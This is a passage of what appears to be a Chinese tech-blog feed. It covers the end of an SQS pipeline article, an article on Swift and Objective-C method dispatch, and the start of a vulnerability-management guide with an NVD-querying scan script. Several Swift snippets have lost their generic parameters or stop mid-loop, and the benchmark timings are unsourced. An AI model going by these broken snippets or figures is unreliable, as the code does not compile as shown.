7.幂等性设计 — Redis 唯一 ID + 队列去重，防止重复处理

8.合理的可见性超时 — 设置为处理时间的 2-3 倍

9.监控告警 — CloudWatch 监控队列深度和消息年龄

10.环境差异化配置 — 通过 SqsEnabledCondition 实现开发/测试/生产不同策略

扩展思路

本架构不仅适用于缩略图生成，同样适用于以下场景：

文件内容审核（接入 AWS Rekognition / 第三方审核 API）
文档格式转换（PDF → 图片、Office → PDF 等）
元数据提取（EXIF 信息、视频时长、分辨率等）
全文索引（文档内容提取后写入 Elasticsearch）
CDN 预热（新文件上传后自动推送到 CDN 节点）只需新增对应的 EventHandler，复用同一套 SQS 监听基础设施即可，真正实现一次配置，无限扩展。

作者介绍：

贺浪高级服务端开发工程师

Swift 方法派发机制深度解析

微鲤技术团队 — Tue, 03 Mar 2026 03:22:24 GMT

深入理解 Swift 中的静态派发、动态派发与性能优化，对比 Objective-C 消息派发机制

前言

在 Swift 开发中，我们经常会遇到这样的问题：

为什么 final关键字能提升性能？
为什么协议扩展中的方法调用结果和我预期的不一样？
什么时候应该使用 @objc dynamic？
struct和class的性能差异本质是什么？
Swift 和 Objective-C 的方法派发有什么本质区别？

这些问题的答案都指向同一个核心概念——方法派发（Method Dispatch）。

本文将深入剖析 Swift 中的方法派发机制，并与 Objective-C 的消息派发机制进行对比，帮助你理解两种语言如何在编译期和运行期确定方法调用，以及如何利用这些知识写出更高效的代码。

1. 缓存查找（Cache Lookup）  
   ↓ 未命中
2. 方法列表查找（Method List）  
   ↓ 未找到
3. 父类方法列表查找（Superclass Method List）  
   ↓ 未找到
4. 消息转发（Message Forwarding）  
   ├─ 动态方法解析（resolveInstanceMethod:）
   ├─ 快速转发（forwardingTargetForSelector:）
   └─ 完整转发（forwardInvocation:）
   ↓ 仍未处理
5. 抛出异常：unrecognized selector sent to instance

详细步骤解析

1. 缓存查找（最快路径）

// 每个类都有一个方法缓存（Cache）

struct objc_cache {

    unsigned int mask;

    unsigned int occupied;

    Method buckets[1];  // 哈希表

};


// 查找过程（伪代码）

cache_entry = cache[selector & mask];

if (cache_entry->selector == selector) {

    return cache_entry->implementation;  // 缓存命中

}

特点：

使用哈希表存储最近调用的方法
命中率高时性能接近直接派发
首次调用或缓存未命中时需要完整查找

2. 方法列表查找

// 类的方法列表结构

struct objc_class {

    Class isa;

    Class superclass;

    cache_t cache;           // 方法缓存

    class_data_bits_t bits;  // 包含方法列表

};


// 查找过程

for (method in class->methodList) {

    if (method->selector == target_selector) {

        // 找到了，加入缓存

        cache_insert(class->cache, method);

        return method->implementation;

    }

}

3. 父类链查找

// 递归查找父类

Class currentClass = class;

while (currentClass != nil) {

    if (method = findMethodInClass(currentClass, selector)) {

        cache_insert(originalClass->cache, method);

        return method->implementation;

    }

    currentClass = currentClass->superclass;

}

4. 消息转发机制

// 第一步：动态方法解析

+ (BOOL)resolveInstanceMethod:(SEL)sel {

    if (sel == @selector(dynamicMethod)) {

        // 动态添加方法实现

        class_addMethod([self class], sel, 

                       (IMP)dynamicMethodIMP, "v@:");

        return YES;

    }

    return [super resolveInstanceMethod:sel];

}


// 第二步：快速转发

- (id)forwardingTargetForSelector:(SEL)aSelector {

    if (aSelector == @selector(someMethod)) {

        return alternateObject;  // 转发给其他对象

    }

    return [super forwardingTargetForSelector:aSelector];

}


// 第三步：完整转发

- (NSMethodSignature *)methodSignatureForSelector:(SEL)aSelector {

    return [NSMethodSignature signatureWithObjCTypes:"v@:"];

}


- (void)forwardInvocation:(NSInvocation *)anInvocation {

    [anInvocation invokeWithTarget:otherObject];

}

OC 消息派发的特点

优点：

1.极致的动态性

运行时添加/替换方法（Method Swizzling）
消息转发机制
动态类型（id 类型）

// Method Swizzling 示例

Method originalMethod = class_getInstanceMethod([self class], 

                                               @selector(original));

Method swizzledMethod = class_getInstanceMethod([self class], 

                                               @selector(swizzled));

method_exchangeImplementations(originalMethod, swizzledMethod);

2.强大的运行时能力

KVO（Key-Value Observing）
KVC（Key-Value Coding）
Runtime 反射

// KVO 的实现依赖于消息派发

[object addObserver:self 

         forKeyPath:@"property" 

            options:NSKeyValueObservingOptionNew 

            context:nil];

缺点：

1.性能开销大

每次方法调用都要查找
即使缓存命中，仍有少量哈希计算开销
无法被编译器优化（内联等）

2.类型安全性差

编译期无法检查方法是否存在
容易出现运行时崩溃

id obj = @"Hello";

[obj nonExistentMethod];  // 编译通过，运行时崩溃

OC 消息派发的性能

// 性能测试（伪代码）

// 直接调用（C 函数）：    1x

// OC 方法（缓存命中）：    1.5x

// OC 方法（缓存未命中）：  3-5x

// 消息转发：              10-20x

Swift 中的四种派发方式

与 Objective-C 不同，Swift 支持多种派发方式，根据场景选择最优方案。

1. 直接派发（Direct Dispatch / Static Dispatch）

特点：编译期确定调用地址，直接跳转
性能：最快，可被编译器内联优化
使用场景：值类型方法、final方法、private方法

struct Point {

    var x: Double

    var y: Double


    // 直接派发，编译为直接的函数调用

    func distance() -> Double {

        return sqrt(x * x + y * y)

    }

}


// 编译后类似于：

// call Point.distance(Point)  // 直接调用

2. 函数表派发（Table Dispatch / V-Table）

特点：通过虚函数表（V-Table）查找方法实现
性能：较快，一次数组查找
使用场景：类的实例方法（非 final）

class Animal {

    // 通过 V-Table 派发

    func makeSound() { 

        print("Some sound") 

    }

}


class Dog: Animal {

    // V-Table 中存储了 Dog 的实现地址

    override func makeSound() { 

        print("Woof!") 

    }

}


// 调用过程：

let animal: Animal = Dog()

animal.makeSound()

// 1. 获取对象的 V-Table 指针

// 2. 在 V-Table 中查找 makeSound 的索引

// 3. 调用对应的实现

V-Table 结构示意：

Animal V-Table:

[0] makeSound -> Animal.makeSound 地址


Dog V-Table:

[0] makeSound -> Dog.makeSound 地址  // 覆盖了父类的实现

3. 见证表派发（Witness Table Dispatch）

特点：通过见证表（Witness Table）查找协议方法实现
性能：与 V-Table 类似
使用场景：协议类型的方法调用

protocol Drawable {

    func draw()

}


struct Circle: Drawable {

    func draw() { print("Drawing circle") }

}


struct Rectangle: Drawable {

    func draw() { print("Drawing rectangle") }

}


let shape: Drawable = Circle()

shape.draw()  // 通过 Witness Table 派发

Witness Table 结构：

Circle Witness Table for Drawable:

[0] draw -> Circle.draw


Rectangle Witness Table for Drawable:

[0] draw -> Rectangle.draw

4. 消息派发（Message Dispatch）

特点：使用 Objective-C 的消息转发机制
性能：最慢，需要运行时查找
使用场景：@objc dynamic方法、与OC交互

class MyClass: NSObject {

    @objc dynamic func dynamicMethod() {

        print("Can be swizzled")

    }

}


// 本质上编译为：

// objc_msgSend(obj, selector("dynamicMethod"))

Swift vs Objective-C 派发机制对比

根本区别

详细对比

1. 方法调用开销

// Swift - 静态派发（Struct）

struct SwiftStruct {

    func method() { }

}

let s = SwiftStruct()

s.method()

// 编译为：call SwiftStruct.method(SwiftStruct)

// 开销：几乎为 0，可被内联


// Swift - V-Table 派发（Class）

class SwiftClass {

    func method() { }

}

let c = SwiftClass()

c.method()

// 编译为：

// 1. load vtable_ptr from c

// 2. load method_ptr from vtable[index]

// 3. call method_ptr(c)

// 开销：2 次内存访问 + 1 次间接调用

// Objective-C - 消息派发

@interface ObjCClass : NSObject

- (void)method;

@end


ObjCClass *obj = [[ObjCClass alloc] init];

[obj method];

// 编译为：objc_msgSend(obj, @selector(method))

// 开销：

// 1. 缓存查找（1-2 次内存访问）

// 2. 如果缓存未命中：方法列表查找（N 次比较）

// 3. 如果找不到：父类链查找 + 消息转发

// 总开销：3-10+ 次内存访问和比较

2. 类型系统

// Swift - 强类型

let string: String = "Hello"

string.uppercased()  // ✅ 编译期确定方法存在


// string.nonExistentMethod()  // ❌ 编译错误


// 协议约束

func process(_ item: T) {

    item.draw()  // 编译期保证 T 实现了 draw

}

// Objective-C - 弱类型

id obj = @"Hello";

[obj uppercaseString];  // ✅ 运行时查找


[obj nonExistentMethod];  // ⚠️ 编译警告，运行时崩溃


// 动态类型

- (void)processObject:(id)obj {

    [obj someMethod];  // 编译期无法确定方法是否存在

}

3. 继承和重写

// Swift - 明确的重写语义

class Base {

    func method() { print("Base") }

}


class Derived: Base {

    override func method() { print("Derived") }

    // 必须使用 override 关键字

}


// 可以禁止重写

final class FinalClass {

    func method() { }  // 无法被继承

}


class AnotherBase {

    final func finalMethod() { }  // 无法被重写

}

// Objective-C - 隐式的重写

@interface Base : NSObject

- (void)method;

@end


@interface Derived : Base

- (void)method;  // 自动重写，无需关键字

@end


// 无法禁止重写（没有 final）

4. 运行时能力

// Objective-C - 强大的运行时

// Method Swizzling

Method original = class_getInstanceMethod([UIViewController class], 

                                          @selector(viewWillAppear:));

Method swizzled = class_getInstanceMethod([UIViewController class], 

                                          @selector(xxx_viewWillAppear:));

method_exchangeImplementations(original, swizzled);


// 动态添加方法

class_addMethod([MyClass class], 

               @selector(dynamicMethod), 

               (IMP)dynamicMethodIMP, 

               "v@:");


// KVO

[object addObserver:self 

         forKeyPath:@"property" 

            options:0 

            context:nil];

// Swift - 有限的运行时能力

class MyClass: NSObject {

    // 必须标记 @objc dynamic 才能使用 OC Runtime 特性

    @objc dynamic func swizzlableMethod() { }


    // 普通 Swift 方法无法 swizzle

    func normalMethod() { }

}


// KVO 需要 @objc dynamic

class Observable: NSObject {

    @objc dynamic var property: String = ""

}


// Swift 不支持动态添加方法

// 但有自己的反射机制（Mirror）

let mirror = Mirror(reflecting: obj)

for child in mirror.children {

    print(child.label, child.value)

}

5. 扩展（Extension）的行为差异

// Objective-C - Category 方法使用消息派发

@interface NSString (MyExtension)

- (void)myMethod;

@end


@implementation NSString (MyExtension)

- (void)myMethod {

    NSLog(@"Extension method");

}

@end


NSString *str = @"Hello";

[str myMethod];  // 通过消息派发查找

// Swift - Extension 方法使用静态派发

extension String {

    func myMethod() {

        print("Extension method")

    }

}


let str = "Hello"

str.myMethod()  // 静态派发，编译期确定


// 无法重写 extension 方法

class MyString: NSString {

    // ❌ 无法重写 Swift extension 方法

}

性能对比测试

// 测试代码（调用 1000 万次）

class TestClass {

    func normalMethod() -> Int { return 1 }

    final func finalMethod() -> Int { return 1 }

    @objc dynamic func dynamicMethod() -> Int { return 1 }

}


// 结果：

// Swift struct method:       10ms   (静态派发)

// Swift final method:        10ms   (静态派发)

// Swift class method:        20ms   (V-Table 派发)

// Swift @objc dynamic:       80ms   (OC 消息派发)

// OC instance method:        85ms   (OC 消息派发)

性能差距：

静态派发 vs OC 消息派发：8-9 倍
V-Table vs OC 消息派发：4 倍

何时选择哪种机制？

选择 Swift 原生机制（静态/表派发）

✅ 适合场景：

性能敏感的代码（游戏、图形处理）
不需要运行时动态性
新的 Swift 项目
类型安全要求高

// 示例：游戏实体系统

struct Entity {

    var position: Vector2D

    var velocity: Vector2D


    mutating func update(deltaTime: Float) {

        position.x += velocity.x * deltaTime

        position.y += velocity.y * deltaTime

    }

}


// 静态派发，可被完全内联优化

func updateEntities(_ entities: inout [Entity], deltaTime: Float) {

    for i in 0..



选择 OC 消息派发（@objc dynamic）

✅ 适合场景：


需要 Method Swizzling
需要 KVO
与 OC 代码交互
需要运行时动态添加方法


// 示例：埋点框架

class AnalyticsTracker: NSObject {

    @objc dynamic func trackEvent(_ name: String) {

        // 原始实现

        sendToServer(name)

    }

}


// 在测试中 swizzle

extension AnalyticsTracker {

    @objc dynamic func test_trackEvent(_ name: String) {

        print("Test: \(name)")

        // 不发送到服务器

    }

}


静态派发详解

什么时候使用静态派发？

Swift 编译器会在以下场景使用静态派发：  

1. 值类型（Struct、Enum）

struct Calculator {

    func add(_ a: Int, _ b: Int) -> Int {

        return a + b  // 静态派发

    }

}


// 编译后：

// call Calculator.add(Calculator, Int, Int) -> Int


原因：值类型不支持继承，编译器知道具体类型。

2. final 类和方法

final class FinalClass {

    func method() { }  // 静态派发

}


class BaseClass {

    final func finalMethod() { }  // 静态派发

    func normalMethod() { }       // 表派发

}


原因：final保证不会被继承或重写。

3. private 和 fileprivate 方法

class MyClass {

    private func privateMethod() {  // 静态派发

        print("Private")

    }


    func publicMethod() {  // 表派发

        print("Public")

    }

}


原因：编译器能确定当前模块内没有重写。

4. 扩展（Extension）中的方法

class MyClass { }


extension MyClass {

    func extensionMethod() {  // 静态派发

        print("Extension")

    }

}


// extension 方法不会加入 V-Table，无法被重写

class SubClass: MyClass {

    // ❌ 无法重写 extensionMethod

}


5. 全模块优化（Whole Module Optimization）

开启 WMO 后，编译器可以分析整个模块，将更多方法静态化。

// 在 WMO 下，如果编译器确认没有子类重写，可能会静态派发

internal class InternalClass {

    func method() { }

}


静态派发的优势

 

  1.性能更高：无需查表，可被内联优化
 

  2.编译期优化：死代码消除、常量折叠
 

  3.代码体积更小：内联后减少函数调用开销

动态派发详解

V-Table 派发原理

每个类都有一个虚函数表（V-Table），存储方法的实现地址：

class Animal {

    func eat() { print("Animal eating") }

    func sleep() { print("Animal sleeping") }

}


class Dog: Animal {

    override func eat() { print("Dog eating") }

    func bark() { print("Woof!") }

}


V-Table 结构：

Animal V-Table:

[0] eat   -> Animal.eat

[1] sleep -> Animal.sleep


Dog V-Table:

[0] eat   -> Dog.eat       // 重写

[1] sleep -> Animal.sleep  // 继承

[2] bark  -> Dog.bark      // 新增


调用过程：

let animal: Animal = Dog()

animal.eat()


// 汇编级别的步骤：

// 1. mov rax, [animal]        ; 获取对象指针

// 2. mov rax, [rax]           ; 获取 V-Table 指针

// 3. mov rax, [rax + 0*8]     ; 获取 eat 方法指针（索引 0）

// 4. call rax                 ; 调用方法


Witness Table 派发原理

协议使用见证表（Witness Table）存储协议要求的实现：

protocol Drawable {

    func draw()

}


struct Circle: Drawable {

    func draw() { print("Circle") }

}


struct Rectangle: Drawable {

    func draw() { print("Rectangle") }

}


Witness Table：

Circle Witness Table for Drawable:

[0] draw -> Circle.draw


Rectangle Witness Table for Drawable:

[0] draw -> Rectangle.draw


存在容器（Existential Container）：

let shape: Drawable = Circle()

// shape 实际上是一个 Existential Container：

// struct ExistentialContainer {

//     var valueBuffer: (Int, Int, Int)  // 存储值（小对象）或指针（大对象）

//     var type: Metadata                 // 类型元数据

//     var witnessTable: WitnessTable     // 见证表指针

// }


消息派发原理（@objc dynamic）

使用 Objective-C 运行时的消息转发机制：

@objc dynamic func dynamicMethod() { }


// 编译为：

objc_msgSend(obj, selector("dynamicMethod"))  


特性：


支持方法交换（Method Swizzling）
支持 KVO
支持消息转发
性能最差


不同类型的派发规则

Class 类的派发规则



class MyClass {

    func normalMethod() { }           // V-Table 派发

    final func finalMethod() { }      // 静态派发

    private func privateMethod() { }  // 静态派发

    @objc func objcMethod() { }       // V-Table 派发（可被 OC 调用）

    @objc dynamic func dynamicMethod() { } // 消息派发

}


extension MyClass {

    func extensionMethod() { }  // 静态派发（无法被重写）

}


Struct/Enum 的派发规则

所有方法都是静态派发

struct MyStruct {

    func method() { }  // 静态派发

}


enum MyEnum {

    case a, b

    func method() { }  // 静态派发

}


Protocol 的派发规则



协议派发的坑

这是 Swift 中最容易出错的地方！

案例 1：协议扩展方法不会被重写

protocol Animal {

    func requiredMethod()

}


extension Animal {

    func extensionMethod() {

        print("From protocol extension")

    }

}


struct Dog: Animal {

    func requiredMethod() {

        print("Dog implementation")

    }


    func extensionMethod() {

        print("Dog extension method")

    }

}


let dog = Dog()

dog.extensionMethod()  // 输出：Dog extension method


let animal: Animal = Dog()

animal.extensionMethod()  // 输出：From protocol extension ⚠️  


原因：


extensionMethod不是协议要求，使用静态派发
以协议类型调用时，编译器在编译期就确定了调用 extension的实现


案例 2：协议要求 vs 协议扩展

protocol Drawable {

    func draw()  // 协议要求

}


extension Drawable {

    func draw() {

        print("Default draw")  // 默认实现

    }


    func debugInfo() {

        print("Debug info")  // 非协议要求

    }

}


struct Circle: Drawable {

    func draw() {

        print("Circle draw")

    }


    func debugInfo() {

        print("Circle debug")

    }

}


let shape: Drawable = Circle()

shape.draw()       // 输出：Circle draw (动态派发)

shape.debugInfo()  // 输出：Debug info (静态派发) ⚠️  


如何避免？

方法 1：在协议中声明所有需要被重写的方法

protocol Drawable {

    func draw()

    func debugInfo()  // 在协议中声明

}


extension Drawable {

    func draw() { print("Default") }

    func debugInfo() { print("Default debug") }

}


struct Circle: Drawable {

    func draw() { print("Circle") }

    func debugInfo() { print("Circle debug") }

}


let shape: Drawable = Circle()

shape.debugInfo()  // 输出：Circle debug ✅  


方法 2：使用具体类型而非协议类型

let circle = Circle()  // 具体类型，非协议类型

circle.debugInfo()  // 输出：Circle debug  


Swift 与 OC 混编的派发规则

NSObject 子类

// 继承自 NSObject 的 Swift 类

class MyViewController: UIViewController {

    // 1. 普通方法：V-Table 派发（Swift 侧）

    func swiftMethod() {

        print("Swift method")

    }


    // 2. override OC 方法：使用 OC 的消息派发

    override func viewDidLoad() {

        super.viewDidLoad()

    }


    // 3. @objc 标记：可被 OC 调用，但仍是 V-Table 派发

    @objc func objcMethod() {

        print("Can be called from OC")

    }


    // 4. @objc dynamic：使用 OC 消息派发

    @objc dynamic func dynamicMethod() {

        print("OC message dispatch")

    }

}


@objc vs @objc dynamic

class MyClass: NSObject {

    // @objc: 暴露给 OC，但仍用 V-Table 派发

    @objc func method1() { }


    // @objc dynamic: 使用 OC 消息派发

    @objc dynamic func method2() { }

}


// 从 Swift 调用

let obj = MyClass()

obj.method1()  // V-Table 派发

obj.method2()  // 消息派发


// 从 OC 调用

MyClass *obj = [[MyClass alloc] init];

[obj method1];  // 消息派发

[obj method2];  // 消息派发


规则总结：


@objc：允许 OC 调用，Swift 内部仍用 V-Table
@objc dynamic：Swift 和 OC 都用消息派发
继承 NSObject不会自动改变派发方式


实战场景：Method Swizzling

// ❌ 无法 Swizzle 普通 Swift 方法

class SwiftClass {

    func method() { }  // V-Table，无法 swizzle

}


// ✅ 必须使用 @objc dynamic

class SwiftClass: NSObject {

    @objc dynamic func method() { }  // 可以 swizzle

}


// Swizzling 代码

extension SwiftClass {

    @objc dynamic func swizzled_method() {

        print("Swizzled")

        swizzled_method()  // 调用原始实现

    }


    static func swizzle() {

        let original = #selector(method)

        let swizzled = #selector(swizzled_method)


        guard let originalMethod = class_getInstanceMethod(self, original),

              let swizzledMethod = class_getInstanceMethod(self, swizzled) else {

            return

        }


        method_exchangeImplementations(originalMethod, swizzledMethod)

    }

}


性能对比与优化建议

性能测试

// 测试代码（简化）

class TestClass {

    func normalMethod() -> Int { return 1 }

    final func finalMethod() -> Int { return 1 }

    @objc dynamic func dynamicMethod() -> Int { return 1 }

}


struct TestStruct {

    func method() -> Int { return 1 }

}


// 调用 1000 万次的性能对比：

// Struct method:        10ms  (静态派发)

// Class final method:   10ms  (静态派发)

// Class normal method:  20ms  (V-Table 派发)

// Dynamic method:       80ms  (消息派发)

// OC method:            85ms  (消息派发)


性能倍数：


静态派发：1x（基准，最快）
V-Table：2x
消息派发：8x


优化建议

1. 优先使用值类型

// ❌ 不必要的 class

class Point {

    var x: Double

    var y: Double

}


// ✅ 使用 struct

struct Point {

    var x: Double

    var y: Double

}


原因：


Struct 使用静态派发
无需堆分配
无引用计数开销


2. 使用 final 关键字

// ❌ 未优化

class ViewManager {

    func updateView() { }

}


// ✅ 使用 final（如果不需要继承）

final class ViewManager {

    func updateView() { }

}


// ✅ 或者只 final 部分方法

class ViewManager {

    final func updateView() { }  // 高频调用的方法

    func configure() { }         // 可能需要重写的方法

}


3. 使用 private/fileprivate

class MyClass {

    // ✅ 内部方法标记为 private

    private func helperMethod() { }


    public func publicMethod() {

        helperMethod()

    }

}


4. 避免不必要的 @objc dynamic

// ❌ 不需要动态特性却使用了 dynamic

class MyClass {

    @objc dynamic func method() { }

}


// ✅ 只在需要时使用

class MyClass {

    func method() { }  // 普通方法就够了


    @objc dynamic func needsSwizzling() { }  // 确实需要的情况

}


5. 使用泛型代替协议类型

// ❌ 使用协议类型（Witness Table 派发）

func process(items: [Drawable]) {

    for item in items {

        item.draw()  // Witness Table 派发

    }

}


// ✅ 使用泛型（静态派发 + 特化）

func process(items: [T]) {

    for item in items {

        item.draw()  // 可被静态派发和内联

    }

}


6. 开启 Whole Module Optimization

在 Build Settings 中开启：


Optimization Level:-O(Release) 
Whole Module Optimization:Yes


效果：


编译器可以分析整个模块
将更多方法从动态派发优化为静态派发
更激进的内联优化


实战案例

案例 1：优化高性能计算代码

// ❌ 优化前：使用协议和 class

protocol MathOperation {

    func calculate(_ value: Double) -> Double

}


class SquareOperation: MathOperation {

    func calculate(_ value: Double) -> Double {

        return value * value

    }

}


func processBatch(_ values: [Double], operation: MathOperation) -> [Double] {

    return values.map { operation.calculate($0) }  // Witness Table 派发（动态）

}


// ✅ 优化后：使用泛型 + struct

protocol MathOperation {

    func calculate(_ value: Double) -> Double

}


struct SquareOperation: MathOperation {

    func calculate(_ value: Double) -> Double {

        return value * value

    }

}


func processBatch(_ values: [Double], operation: Op) -> [Double] {

    return values.map { operation.calculate($0) }  // 静态派发 + 内联

}


// 性能提升：约 3-5 倍


案例 2：修复协议扩展的坑

// ❌ 错误实现

protocol ViewConfigurable {

    func configure()

}


extension ViewConfigurable {

    func configure() {

        setupDefaultStyle()

    }


    func setupDefaultStyle() {

        print("Default style")

    }

}


class CustomView: UIView, ViewConfigurable {

    func setupDefaultStyle() {

        print("Custom style")

    }

}


let view: ViewConfigurable = CustomView()

view.configure()  // 调用 setupDefaultStyle 时输出：Default style ⚠️


// ✅ 正确实现：在协议中声明

protocol ViewConfigurable {

    func configure()

    func setupDefaultStyle()  // 声明为协议要求

}


extension ViewConfigurable {

    func configure() {

        setupDefaultStyle()

    }


    func setupDefaultStyle() {

        print("Default style")

    }

}


class CustomView: UIView, ViewConfigurable {

    func setupDefaultStyle() {

        print("Custom style")

    }

}


let view: ViewConfigurable = CustomView()

view.configure()  // 输出：Custom style ✅  


案例 3：Swift 与 OC 混编优化

// ❌ 过度使用 dynamic

class APIManager: NSObject {

    @objc dynamic func fetchData() { }  // 不需要 dynamic

}


// ✅ 只使用 @objc

class APIManager: NSObject {

    @objc func fetchData() { }  // Swift 内部用 V-Table，OC 可调用

}


// 性能提升：Swift 侧调用快 4 倍


案例 4：游戏实体系统优化

// ❌ 使用 class + 协议

protocol GameEntity {

    var position: CGPoint { get set }

    func update(deltaTime: Float)

}


class Player: GameEntity {

    var position: CGPoint

    func update(deltaTime: Float) { /* ... */ }

}


var entities: [GameEntity] = []  // 存在容器开销 + Witness Table


// ✅ 使用 struct + 泛型

protocol GameEntity {

    var position: CGPoint { get set }

    mutating func update(deltaTime: Float)

}


struct Player: GameEntity {

    var position: CGPoint

    mutating func update(deltaTime: Float) { /* ... */ }

}


// 使用具体类型数组

var players: [Player] = []  // 连续内存 + 静态派发


// 或使用泛型容器

struct EntityManager {

    var entities: [T]


    mutating func update(deltaTime: Float) {

        for i in 0..


总结

核心要点

Swift 与 OC 的本质区别：


OC：所有方法调用默认使用消息派发，极致的动态性，性能开销大
Swift：默认使用静态派发和表派发，性能优先，动态性受限


Swift 的四种派发方式：


静态派发：最快，用于值类型、final、private
V-Table 派发：较快，用于类的普通方法
Witness Table 派发：中等，用于协议方法
消息派发：最慢，用于 @objc dynamic


OC 消息派发机制：


缓存查找 → 方法列表 → 父类链 → 消息转发
强大的动态性：Method Swizzling、KVO、动态添加方法
性能开销：比 Swift 静态派发慢 8 倍以上


协议派发的坑：


协议要求的方法：动态派发
协议扩展的非要求方法：静态派发
*　以协议类型调用时，扩展方法不会被"重写"


Swift 与 OC 混编：


@objc：暴露给 OC，Swift 内部仍用 V-Table
@objc dynamic：Swift 和 OC 都用消息派发
继承 NSObject 不改变派发方式


性能优化策略



决策树

需要 OC Runtime 特性（Swizzling/KVO）？

├─ 是 → 用 @objc dynamic (消息派发)

└─ 否 → 需要继承？

    ├─ 否 → 用 struct (静态派发)

    └─ 是 → 用 class

        ├─ 需要被重写？

        │   ├─ 否 → 用 final (静态派发)

        │   └─ 是 → 普通方法 (V-Table 派发)

        └─ 需要暴露给 OC？

            └─ 是 → 用 @objc (V-Table，OC 可调用)


附录：底层实现细节

Swift V-Table 的内存布局

class Animal {

    var name: String = ""

    func eat() { }

    func sleep() { }

}


// 内存布局（简化）

struct Animal_Instance {

    HeapObject header;           // 引用计数等

    String name;                 // 存储属性

}


struct Animal_VTable {

    void (*destroy)(Animal*);    // 析构函数

    size_t size;                 // 对象大小

    void (*eat)(Animal*);        // 方法 1

    void (*sleep)(Animal*);      // 方法 2

}


OC 消息派发的汇编实现

; objc_msgSend 的简化实现

_objc_msgSend:

    ; 检查 receiver 是否为 nil

    test    rdi, rdi

    je      LNilReceiver


    ; 获取 isa 指针（类指针）

    mov     rax, [rdi]


    ; 在缓存中查找方法

    mov     r10, [rax + 16]      ; 获取 cache

    and     r11, rsi, [r10]      ; selector & mask

    lea     r12, [r10 + r11*16]  ; cache bucket


LCacheLookup:

    cmp     [r12], rsi           ; 比较 selector

    je      LCacheHit            ; 找到了

    cmp     [r12], 0             ; 检查是否为空

    je      LCacheMiss           ; 缓存未命中

    add     r12, 16              ; 下一个 bucket

    jmp     LCacheLookup


LCacheHit:

    jmp     [r12 + 8]            ; 调用 IMP


LCacheMiss:

    ; 调用慢速查找

    jmp     __objc_msgSend_uncached


作者介绍：


时晓东  高级iOS开发工程师



基础服务安全漏洞管理最佳实践
微鲤技术团队 — Tue, 03 Mar 2026 03:21:59 GMT
目录

1.概述 

2.漏洞发现


主动扫描
系统通知


3.漏洞分析


影响范围评估
风险等级判定


4.漏洞处理


环境搭建
漏洞复现
成因分析
修复方案


5.验证与总结 

6.持续改进 

7.附录

1. 概述

1.1 目的

建立标准化的漏洞管理流程，确保基础服务安全漏洞能够被及时发现、评估、修复和验证。

 

  流程说明：本指南以 CVE-2025-55182（React2Shell）漏洞为实际案例，完整展示从发现到修复的全过程。该漏洞是 React Server Components 中的远程代码执行漏洞，CVSS 评分 10.0（满分），具有代表性和典型性。

1.2 适用范围

本流程适用于以下基础服务和中间件的漏洞管理，当前维护的服务清单如下：
 

  services-versions.json（服务版本清单）：

{

  "services": [

    {

      "name": "Apache Tomcat",

      "product": "tomcat",

      "version": "8.5.93"

    },

    {

      "name": "OpenJDK 21",

      "product": "openjdk",

      "version": "21.0.1"

    },

    {

      "name": "OpenJDK 8",

      "product": "jdk",

      "version": "1.8.0_392"

    },

    {

      "name": "Node.js",

      "product": "node.js",

      "version": "22.0.0"

    },

    {

      "name": "React",

      "product": "react",

      "version": "19.0.0"

    }

  ]

}


字段说明：


name：服务显示名称，用于报告展示
product：产品名称，用于 NVD 数据库查询（需与 CVE 中的产品名称匹配）
version：当前使用的版本号


维护要求：


新增服务时，及时添加到清单中
版本升级后，立即更新版本号
每月核对一次，确保信息准确


1.3 角色与职责



2. 漏洞发现

2.1 主动扫描方式（主动扫描发现服务清单中，基础服务的高危漏洞）

2.1.1 扫描工具

 

  工具名：漏洞扫描脚本（scan-vulnerabilities.py）

 

  完整代码：

#!/usr/bin/env python3

import json

import requests

import time

from datetime import datetime


def load_services(file_path):

    """加载服务版本清单"""

    with open(file_path, 'r', encoding='utf-8') as f:

        return json.load(f)['services']


def check_nvd(product, version):

    """查询 NVD 数据库获取漏洞信息"""

    url = "https://services.nvd.nist.gov/rest/json/cves/2.0"

    params = {

        "keywordSearch": f"{product} {version}",  # 关键词搜索

        "resultsPerPage": 20  # 每页返回 20 条结果

    }


    try:

        response = requests.get(url, params=params, timeout=10)

        if response.status_code == 200:

            data = response.json()

            vulnerabilities = []


            # 遍历所有漏洞

            for item in data.get("vulnerabilities", []):

                cve = item.get("cve", {})

                cve_id = cve.get("id")

                description = cve.get("descriptions", [{}])[0].get("value", "")


                # 获取 CVSS 评分（优先 v3.1 > v3.0 > v2）

                metrics = cve.get("metrics", {})

                cvss_v31 = metrics.get("cvssMetricV31", [])

                cvss_v30 = metrics.get("cvssMetricV30", [])

                cvss_v2 = metrics.get("cvssMetricV2", [])


                score = None

                severity = None


                if cvss_v31:

                    cvss_data = cvss_v31[0].get("cvssData", {})

                    score = cvss_data.get("baseScore")

                    severity = cvss_data.get("baseSeverity")

                elif cvss_v30:

                    cvss_data = cvss_v30[0].get("cvssData", {})

                    score = cvss_data.get("baseScore")

                    severity = cvss_data.get("baseSeverity")

                elif cvss_v2:

                    cvss_data = cvss_v2[0].get("cvssData", {})

                    score = cvss_data.get("baseScore")

                    # v2 没有 severity，根据评分判断

                    severity = "HIGH" if score >= 7.0 else "MEDIUM" if score >= 4.0 else "LOW"


                # 只保留高危和严重漏洞

                if severity in ["HIGH", "CRITICAL"]:

                    vulnerabilities.append({

                        "cve_id": cve_id,

                        "severity": severity,

                        "score": score,

                        "description": description[:200]  # 截取前 200 字符

                    })


            return vulnerabilities

    except Exception as e:

        print(f"    ❌ 查询失败: {e}")

        return []


    return []


def main():

    print(f"{'='*70}")

    print(f"漏洞扫描报告 - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")

    print(f"{'='*70}\n")


    # 加载服务清单

    services = load_services('services-versions.json')

    total_vulns = 0


    # 遍历所有服务进行扫描

    for service in services:

        name = service['name']

        product = service['product']

        version = service['version']


        print(f" {name} ({version})")

        print(f"   正在查询 NVD 数据库...")


        # 查询漏洞

        vulns = check_nvd(product, version)


        if vulns:

            total_vulns += len(vulns)

            print(f"   ⚠️  发现 {len(vulns)} 个高危/严重漏洞:\n")

            for v in vulns:

                print(f"       {v['cve_id']}")

                print(f"         严重程度: {v['severity']} (评分: {v['score']})")

                print(f"         描述: {v['description']}")

                print()

        else:

            print(f"   ✅ 未发现高危漏洞\n")


        # NVD API 限流：无 API Key 时每 6 秒一次请求

        time.sleep(6)


    print(f"{'='*70}")

    print(f"扫描完成 - 共发现 {total_vulns} 个高危/严重漏洞")

    print(f"{'='*70}")


if __name__ == "__main__":

    main()


脚本说明：



数据源： NVD（美国国家漏洞数据库）REST API v2.0

